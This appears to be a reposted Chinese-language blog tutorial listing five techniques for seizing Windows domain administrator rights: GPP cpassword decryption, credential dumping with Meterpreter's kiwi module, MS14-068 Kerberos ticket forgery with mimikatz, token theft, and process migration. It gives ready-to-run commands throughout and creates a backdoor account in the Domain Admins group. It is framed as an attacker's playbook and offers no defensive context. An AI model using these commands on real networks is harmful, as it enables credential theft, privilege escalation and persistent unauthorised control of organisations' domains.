在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權限呢?
在大多數情況下,攻擊者可以通過定位域管理員所登錄的服務器,利用漏洞獲取服務器system權限,找到域管理的賬號、行程或是身份驗證令牌,從而獲取域管理員權限,本文分享幾種常見的獲取域管理員權限的方式,
第1種方式:利用GPP漏洞獲取域管理權限
SYSVOL是域內的共享檔案夾,用來存放登錄腳本、組策略腳本等資訊,當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題,
(1)訪問SYSVOL共享檔案夾,搜索包含“cpassword”的XML檔案,獲取AES加密的密碼,
(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權限,
第2種方式:獲取服務器明文登錄密碼
使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system,提到system有兩個方法,一是當前的權限是administrator用戶,二是利用其它手段先提權到administrator用戶,然后administrator用戶可以直接getsystem到system權限,
meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM加載kiwi模塊
load kiwi列舉系統中的明文密碼
creds_all
第3種方式:使用MS14-068漏洞進行提權
MS14068是一個能夠使普通用戶提權到域控權限的權限提升漏洞,攻擊者可以通過構造特定的請求包來達到提升權限的目的,
攻擊流程:
第一步:利用MS14-068偽造生成TGT
MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
第二步:利用mimikatz將工具得到的TGT票據寫入記憶體,創建快取證書
mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
第三步:獲取域管理員權限,創建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作,
PsExec.exe \\dc cmd.exe
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins" test /add /domain
// 查看域管理員
net group "domain admins" /domain第4種方式:竊取域管理員令牌
當有域控賬戶登陸至服務器時可使用令牌模擬進行滲透取得域控權限,
1、入侵域管理員所在的服務器,竊取域管理員的令牌,從而控制整個域,
2、直接在meterpreter shell上執行添加域管理員
add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址第5種方式:行程遷移
入侵了域管理員所登錄的服務器,將行程遷移到域管理員所運行的行程,就可以獲得域管理員權限,
1、獲取域管理員串列
net group "Domain Admins" /domain
2、利用ps找到域管理員(TEST\bypass)所運行的行程,然后將shell行程遷移到域管理員所運行的行程中,成功后就獲得了域管理員權限,如下圖所示:
3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:
// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins" test /add /domain4、成功添加了域管理員賬號test,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/312059.html
標籤:其他